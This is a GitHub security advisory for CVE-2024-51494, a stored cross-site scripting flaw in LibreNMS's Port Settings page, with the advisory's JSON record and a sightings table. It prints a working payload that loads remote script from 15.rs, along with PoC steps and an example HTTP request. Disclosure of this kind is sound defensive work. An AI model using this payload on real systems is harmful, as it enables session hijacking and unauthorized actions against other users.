ghsa-7663-37rg-c377
Vulnerability from github
Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "descr" parameter when editing a device's port settings. This vulnerability can lead to the execution of malicious code when the "Port Settings" page is visited, potentially compromising the user's session and allowing unauthorized actions.
Details
When editing a device's port settings, an attacker can inject the following XSS payload into the "descr" parameter:
lo'"><script/src=//15.rs>
Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.
The payload triggers when the "Port Settings" page is visited, exploiting the $port->ifAlias
variable in the application. The sink is located here:
https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L82
PoC
- Edit a device's port settings using the following payload in the "descr" parameter:
lo'"><script/src=//15.rs>
- Save the changes.
- Navigate to the "Port Settings" page of the device.
- Observe that the injected script executes.
Example Request: ```http POST /ajax_form.php HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-TOKEN: X-Requested-With: XMLHttpRequest Cookie:
type=update-ifalias&descr=lo'%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E&ifName=lo&port_id=1&device_id=1 ```
Impact
This vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the "Port Settings" page of the device. This could lead to the compromise of user accounts and unauthorized actions performed on their behalf.
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 24.9.1" }, "package": { "ecosystem": "Packagist", "name": "librenms/librenms" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "24.10.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-51494" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-11-15T15:43:20Z", "nvd_published_at": "2024-11-15T16:15:37Z", "severity": "HIGH" }, "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Port Settings\" page allows authenticated users to inject arbitrary JavaScript through the \"descr\" parameter when editing a device\u0027s port settings. This vulnerability can lead to the execution of malicious code when the \"Port Settings\" page is visited, potentially compromising the user\u0027s session and allowing unauthorized actions.\n\n### Details\nWhen editing a device\u0027s port settings, an attacker can inject the following XSS payload into the \"descr\" parameter:\n```lo\u0027\"\u003e\u003cscript/src=//15.rs\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe payload triggers when the \"Port Settings\" page is visited, exploiting the `$port-\u003eifAlias` variable in the application. The sink is located here:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L82\n\n### PoC\n1. Edit a device\u0027s port settings using the following payload in the \"descr\" parameter:\n```lo\u0027\"\u003e\u003cscript/src=//15.rs\u003e```\n2. Save the changes.\n3. Navigate to the \"Port Settings\" page of the device.\n4. Observe that the injected script executes.\n\nExample Request:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRF-TOKEN: \u003cyour_token\u003e\nX-Requested-With: XMLHttpRequest\nCookie: \u003cyour_cookie\u003e\n\ntype=update-ifalias\u0026descr=lo\u0027%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026ifName=lo\u0026port_id=1\u0026device_id=1\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users\u0027 sessions when they visit the \"Port Settings\" page of the device. This could lead to the compromise of user accounts and unauthorized actions performed on their behalf.", "id": "GHSA-7663-37rg-c377", "modified": "2024-11-15T20:50:16Z", "published": "2024-11-15T15:43:20Z", "references": [ { "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-7663-37rg-c377" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51494" }, { "type": "WEB", "url": "https://github.com/librenms/librenms/commit/82a744bfe29017b8b58b5752ab9e1b335bedf0a0" }, { "type": "PACKAGE", "url": "https://github.com/librenms/librenms" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L", "type": "CVSS_V3" } ], "summary": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/app/Http/Controllers/Table/EditPortsController.php" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.